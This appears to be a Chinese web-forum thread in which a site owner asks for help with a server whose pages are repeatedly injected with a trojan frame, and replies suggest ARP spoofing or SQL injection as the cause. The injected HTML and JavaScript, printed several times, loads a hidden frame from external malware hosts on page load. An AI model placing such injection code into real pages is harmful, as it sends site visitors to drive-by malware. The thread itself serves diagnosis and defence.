81,092
社区成员
发帖
与我相关
我的任务
分享网站被挂马怎么办啊!急
尝试操作如下未果:
1。用麦咖啡及360扫描服务器全盘文件,并未发现任何病毒及木马程序。
2。格式化服务器硬盘并,重新安装程序。(失败,格式化,重新安装完后照样被挂马)
3。怀疑窃取服务器端密码。(失败,服务器端日志正常,密码安全措施严密)
4。怀疑入侵数据库。(怀疑中,目前只要刷新数据库网页能恢复正常,但经过多次数据库刷新和重新启动数据库及数据服务后,有时并不能恢复正常。)
现把木马页面源代码公布如下
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://ip8ip.3322.org/aa/a2.htm?1";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/user/vote/uservote.jsp?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>
src="/user/vote/uservote.jsp?UpdatedPage=aGlqYWNr"多出了参数UpdatedPage=aGlqYWNr和函数showme()
望牛人帮忙解决哈~!~!~!
1。用麦咖啡及360扫描服务器全盘文件,并未发现任何病毒及木马程序。
2。格式化服务器硬盘并,重新安装程序。(失败,格式化,重新安装完后照样被挂马)
3。怀疑窃取服务器端密码。(失败,服务器端日志正常,密码安全措施严密)
4。怀疑入侵数据库。(怀疑中,目前只要刷新数据库网页能恢复正常,但经过多次数据库刷新和重新启动数据库及数据服务后,有时并不能恢复正常。)
现把木马页面源代码公布如下
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://ip8ip.3322.org/aa/a2.htm?1";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/user/vote/uservote.jsp?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>
src="/user/vote/uservote.jsp?UpdatedPage=aGlqYWNr"多出了参数UpdatedPage=aGlqYWNr和函数showme()
望牛人帮忙解决哈~!~!~!
...全文
请发表友善的回复…
发表回复
wy811007 2011-01-10
- 打赏
- 举报
如何 解决sql注入啊
fz04003 2010-06-02
- 打赏
- 举报
今天遇到一样的问题,最终发现不是程序问题,是机房内部ARP挂马攻击
解决方案如下:
在服务器安装360,启动木马防火墙中的ARP防火墙
1、手工绑定机房的服务器网关IP地址与MAC地址
2、ARP主动防御方式:始终启用,防御速度6个/秒----这个是极为怪异的,自动防御竟然是无效的说,真是好搞笑
一般这样就好了,不行就是缓存,重启,过几分钟就好
解决方案如下:
在服务器安装360,启动木马防火墙中的ARP防火墙
1、手工绑定机房的服务器网关IP地址与MAC地址
2、ARP主动防御方式:始终启用,防御速度6个/秒----这个是极为怪异的,自动防御竟然是无效的说,真是好搞笑
一般这样就好了,不行就是缓存,重启,过几分钟就好
dreamshadow 2009-10-20
- 打赏
- 举报
这是一种ARP病毒的症状,通常中毒页面的代码会变成以下内容:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
如果你的页面有类似代码,可以肯定的是你的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址!
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
如果你的页面有类似代码,可以肯定的是你的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址!
129find 2009-07-24
- 打赏
- 举报
已经解决,解决sql注入问题就ok了
ofacop 2009-07-13
- 打赏
- 举报
lz,解决没?
SK猫 2009-07-08
- 打赏
- 举报
SQL防注入,网上有些通用版的防注入,include到连接数据库那个文件就可以了
129find 2009-07-08
- 打赏
- 举报
[Quote=引用 10 楼 kadach11 的回复:]
你的请求ADDRESS 太过明显,试试用URLREWRITE 把地址修饰下。另推荐定义个权限过滤器。
[/Quote]
如何使用URLREWRITE 进行地址修饰?
还有如何判断传的参数是否包含sql关键字?
希望能指点一二
你的请求ADDRESS 太过明显,试试用URLREWRITE 把地址修饰下。另推荐定义个权限过滤器。
[/Quote]
如何使用URLREWRITE 进行地址修饰?
还有如何判断传的参数是否包含sql关键字?
希望能指点一二
APOLLO_TS 2009-07-07
- 打赏
- 举报
手头没点东西干找可就费劲了!!
-------------------------------
你要是有追踪器什么的就可以马马虎虎的用用。先给你个费劲的手动方法:
--------------------------------------------
首先你要把服务器操作系统告诉大家吧!!
scan 端口。一个一个的关掉,刷新网页。
如果刷到2022---网页不在有新情况就要确定2022是什么程序了!
------------------------------------------------------------------------
-------------------------------
你要是有追踪器什么的就可以马马虎虎的用用。先给你个费劲的手动方法:
--------------------------------------------
首先你要把服务器操作系统告诉大家吧!!
scan 端口。一个一个的关掉,刷新网页。
如果刷到2022---网页不在有新情况就要确定2022是什么程序了!
------------------------------------------------------------------------
sheng90hou 2009-07-07
- 打赏
- 举报
帮你顶顶.
等高ren
等高ren
zl3450341 2009-07-07
- 打赏
- 举报
帮顶
bolink5 2009-07-07
- 打赏
- 举报
友情帮顶啊
期待牛人
期待牛人
kadach11 2009-07-07
- 打赏
- 举报
你的请求ADDRESS 太过明显,试试用URLREWRITE 把地址修饰下。另推荐定义个权限过滤器。
Sunny_kaka 2009-07-07
- 打赏
- 举报
帮你顶顶.
等高手来
等高手来
wood_001 2009-07-07
- 打赏
- 举报
不要给它喂草 饿死它 ×× 玩笑话
cheng8078 2009-07-07
- 打赏
- 举报
试一下换一下网站的IP看看,或者让托管机房的管理员检查一下机房的情况
Defonds 2009-07-04
- 打赏
- 举报
mark
chenhao_283 2009-07-04
- 打赏
- 举报
站在这里等牛人;解
jiaqiangzhou 2009-07-04
- 打赏
- 举报
把代码删了不行吗?
